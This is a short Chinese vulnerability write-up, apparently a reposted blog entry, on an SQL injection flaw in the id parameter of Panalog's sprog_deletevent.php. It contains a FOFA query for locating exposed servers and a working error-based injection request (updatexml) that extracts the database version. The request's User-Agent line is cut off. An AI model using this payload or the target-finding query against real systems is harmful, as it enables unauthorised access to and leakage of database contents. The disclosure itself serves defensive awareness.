本文共 587 字，大约阅读时间需要 1 分钟。

Panalog 大数据日志审计系统

产品简介

Panalog 大数据日志审计系统是一款专注于高校、公安、政企、医疗、金融、能源等行业的网络流量分析平台。系统通过大数据采集、分析和整合技术，对用户网络行为进行审计，提供全方位的网络安全管理解决方案。

SQL 注入漏洞概述

系统中 Panabit/Maintain/sprog_deletevent.php 文件的 id 参数存在 SQL 注入漏洞。攻击者可通过构造特定 SQL 语句，获取数据库信息并进一步利用，造成敏感信息泄露和其他安全风险。

漏洞复现环境

系统运行环境：

• FOFA ：app="Panabit-Panalog" & port="8012"
• 服务器配置：需确保系统运行中 srog_deletevent.php 文件路径正确。

漏洞复现 PoC

GET /Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(select+version%28%29)),0)&cloudip=1 HTTP/1.1
Host: your-ip
User-Agent: Mo

安全建议

• 权限管理：及时审核用户权限，防止未授权访问。
• 测试工具：使用专用工具对系统进行定期安全测试。
• 系统更新：保持系统及插件更新，防止已知漏洞利用。

转载地址：http://wnvfk.baihongyu.com/